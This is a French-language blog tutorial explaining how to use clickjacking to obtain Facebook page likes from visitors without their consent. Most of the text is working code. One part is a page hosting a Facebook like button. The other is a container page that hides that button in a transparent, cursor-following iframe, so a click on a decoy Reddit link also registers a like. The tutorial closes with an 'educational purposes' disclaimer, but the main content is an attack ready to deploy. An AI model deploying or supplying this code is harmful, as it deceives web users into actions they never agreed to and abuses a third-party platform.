Aujourd’hui, nous étudierons comment tromper un utilisateur pour obtenir son like vers votre page Facebook sans son consentement grâce au Clickjacking.
Nous utiliserons le travail réalisé par Samy Kamkar, chercheur en sécurité informatique durant ce tutoriel.
Définition de Clickjacking
Le clickjacking est un type d’attaque qui permet à un site malveillant d’envelopper un autre dans un conteneur.
Ainsi, un utilisateur peut être dupé en effectuant une action non souhaitée sans le savoir.
Mise en pratique
Page de contenu
Rendez-vous ici pour créer un bouton de like vers votre page Facebook.
Premièrement, nous créons une page de contenu avec notre bouton de like Facebook.
Créez ensuite une page “contenu.html” et ajoutez s’y le code généré pour le bouton Facebook.
# contenu.html <html> <head> <title>Page contenu</title> </head> <body> <div id="fb-root"></div> <script> (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_GB/sdk.js#xfbml=1&version=v2.7&appId=1623769651169082"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); </script> <div class="fb-like" data-href="https://www.facebook.com/upidev/" data-layout="button" data-action="like" data-show-faces="false" data-share="false"> </div> </body> </html>
Page conteneur
La page de contenu créé précèdemment doit être accessible depuis internet.
Afin de générer, la page conteneur consultez Quickjack Tools.
Ajoutez la page dans le champs de saisie, puis appuyez sur “Go”.
A présent, sélectionnez le bouton Facebook, une croix doit apparaître au dessus.
Afin de terminer, cliquez sur “I’m Done ” et coller le code généré dans un fichier appelé “conteneur.html”
# conteneur.html <style>body{margin:0px;padding:0px;} </style> <div style="overflow:hidden;width:1px;height:1px;position:relative;" id=v><iframe id="cksl7" name="cksl7" src="https://www.upidev.com/test-clickjacking-code" style="border:0px;left:-194px;top:-277px;position:absolute;filter:alpha(opacity=0);z-index:1;opacity:0;overflow:hidden;width:1525px;height:794px;"> </iframe></div> <script>var d=document;if(!d.all)d.captureEvents(Event.MOUSEMOVE);d.onmousemove=function(e){var i=d.getElementById("v").style;i.left=d.all?event.clientX+d.body.scrollLeft:e.pageX;i.top=d.all?event.clientY+d.body.scrollTop:e.pageY;};</script><script src="https://code.jquery.com/jquery-2.1.3.min.js"> </script> <script>$(function(){var i=-1;$("#cksl7").hover(function(){i=$(this).closest("#v").attr("qjid");},function(){i=-1;});$(window).focus();$(window).blur(function(){document.getElementById("v").style.visibility="hidden";});});$(window).focus() </script> <a href="http://reddit.com"> Cliquez ici pour accéder à Reddit</a>
La page redirigera l’utilisateur vers Reddit, tout en likant la page faceboook concernée.
Le tutoriel a été réalisé à des fins éducatives, le site internet Upidev.com et son créateur ne sont pas responsable de l’utilisation de ce tutoriel pour un autre usage.
Le résultat est accessible ici.
Merci à leblogduhacker.fr pour la seconde illustration.